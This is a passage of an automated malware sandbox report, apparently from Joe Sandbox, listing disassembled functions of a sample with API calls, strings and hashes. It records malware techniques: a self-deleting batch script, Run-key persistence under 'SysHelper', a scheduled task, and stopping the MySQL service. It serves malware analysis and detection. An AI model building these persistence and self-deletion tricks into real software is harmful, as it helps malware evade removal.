                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                        • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                        • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                        • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                        • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00427B21 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                                                        • _free.LIBCMT ref: 00427B42
                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                        • _free.LIBCMT ref: 00427B55
                                                                                                                                        • _free.LIBCMT ref: 00427B73
                                                                                                                                        • _free.LIBCMT ref: 00427B85
                                                                                                                                        • _free.LIBCMT ref: 00427B96
                                                                                                                                        • _free.LIBCMT ref: 00427BA1
                                                                                                                                        • _free.LIBCMT ref: 00427BC5
                                                                                                                                        • EncodePointer.KERNEL32(006B54E8), ref: 00427BCC
                                                                                                                                        • _free.LIBCMT ref: 00427BE1
                                                                                                                                        • _free.LIBCMT ref: 00427BF7
                                                                                                                                        • _free.LIBCMT ref: 00427C1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                        • String ID: Tk
                                                                                                                                        • API String ID: 3064303923-3766924316
                                                                                                                                        • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                        • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                                                        • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                                                        • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncmp
                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                        • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                        • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                        • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                        • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                                                        • _malloc.LIBCMT ref: 0041BBE4
                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                                                        • _free.LIBCMT ref: 0041BCD7
                                                                                                                                          • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                                                          • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                                                          • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                                                          • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                                                          • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                                                          • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                                                        • IsWindow.USER32(?), ref: 0041BF69
                                                                                                                                        • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                        • Opcode ID: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                                                                                                                                        • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                                                        • Opcode Fuzzy Hash: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                                                                                                                                        • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                                                        • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                                                        • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                                                        • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                        • API String ID: 679253221-3783449302
                                                                                                                                        • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                        • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                                                        • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                                                        • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                        • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                        • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                        • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                        • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                        • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                        • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                                                        • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                                                        • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                        • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                          • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                                                        • vswprintf.LIBCMT ref: 00454B5D
                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                        • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                        • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                                                        • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                                                        • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                        • _memset.LIBCMT ref: 004123B6
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                        • SysHelper, xrefs: 004123D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                        • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                        • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                        • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                                                                        • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                        • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                        • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                                                                        • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                                                        • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                                                        • _memset.LIBCMT ref: 0040DC38
                                                                                                                                        • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                        • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                        • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                                                        • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                                                        • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                                                        • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                        • String ID: MYSQL
                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                        • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                        • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                                                        • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                                                        • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                          • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                          • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                        • String ID: bad function call
                                                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
